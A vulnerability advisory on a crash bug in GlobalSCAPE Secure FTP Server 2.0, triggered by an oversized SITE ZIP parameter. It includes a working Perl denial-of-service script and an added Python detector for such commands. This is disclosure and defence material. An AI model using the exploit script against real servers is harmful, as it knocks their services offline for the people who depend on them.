A vulnerability in GlobalSCAPE Secure FTP Server allows a user who issues a long parameter (around 252 bytes) as the value for a SITE command to cause the server to try to write to an address outside the Secure FTP Server's memory. This in turn triggers an unhandled exception, which causes the program to crash.
Credit:
SecurITeam would like to thank STORM for finding this vulnerability.
Vulnerable Systems:
* GlobalSCAPE Secure FTP Server version 2.0 Build 03.11.2004.2
Immune Systems:
* GlobalSCAPE Secure FTP Server version 2.0 Build 03.16.2004.1
Exploit:
To demonstrate this issue we will use the SITE ZIP command. Even though SITE ZIP isn't a supported command, the "/d:" parameter provided after it still gets parsed, and this is what causes the vulnerability.
#!/usr/bin/perl
use IO::Socket;

$host = "192.168.1.243";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2117");
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";

# Read the banner until the 220 greeting arrives.
while (<$remote>)
{
    print $_;
    if (/220 /)
    {
        last;
    }
}
$remote->autoflush(1);

# Log in as anonymous; wait for 331 (password required).
my $ftp = "USER anonymous\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
    print $_;
    if (/331 /)
    {
        last;
    }
}

# Send the password; wait for 230 (logged in).
$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
    print $_;
    if (/230 /)
    {
        last;
    }
}

# Send SITE ZIP with a 252-byte "/d:" parameter.
$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
    print $_;
    if (/250 Done/)
    {
        last;
    }
}
close $remote;
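Detection example (added here, not part of the original advisory or of GlobalSCAPE's code): a Python check over captured client-to-server FTP control-channel lines that flags SITE commands carrying an oversized or single-byte-padded parameter like the one described above. The limits MAX_LINE and MAX_SITE_PARAM, the finding names and the sample session are assumptions constructed for illustration.

```python
import re

# Assumed limits (not from the advisory): tune to what your clients really send.
MAX_LINE = 512        # whole command line, including CRLF
MAX_SITE_PARAM = 128  # bytes after the SITE subcommand; the advisory cites ~252
REPEAT_RUN = re.compile(rb"(.)\1{63,}", re.DOTALL)  # 64+ copies of one byte

def parse_command(line: bytes):
    """Split a client control-channel line into (verb, argument bytes)."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    return verb.decode("ascii", "replace").upper(), arg

def check_line(line: bytes):
    """Return the list of findings for one client command line."""
    findings = []
    if len(line) > MAX_LINE:
        findings.append("line-too-long")
    verb, arg = parse_command(line)
    if verb == "SITE":
        # Everything after the subcommand (ZIP, CHMOD, ...) is its parameter.
        _sub, _, params = arg.partition(b" ")
        if len(params) > MAX_SITE_PARAM:
            findings.append("site-param-too-long")
        if REPEAT_RUN.search(params):
            findings.append("repeated-byte-run")
    return findings

def scan_session(lines):
    """Return (line_no, verb, arg_length, findings) for every flagged line."""
    hits = []
    for no, line in enumerate(lines, 1):
        findings = check_line(line)
        if findings:
            verb, arg = parse_command(line)
            hits.append((no, verb, len(arg), findings))
    return hits

# Constructed sample session (client-to-server lines only).
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS a@b.com\r\n",
    b"SITE CHMOD 644 report.txt\r\n",
    b"SITE ZIP /d:" + b"A" * 252 + b"\r\n",
]

if __name__ == "__main__":
    for no, verb, arg_len, findings in scan_session(SAMPLE):
        print(f"line {no}: {verb} argument of {arg_len} bytes -> {', '.join(findings)}")
```

Only lengths and finding names are reported, so the oversized parameter itself is not copied into the alert.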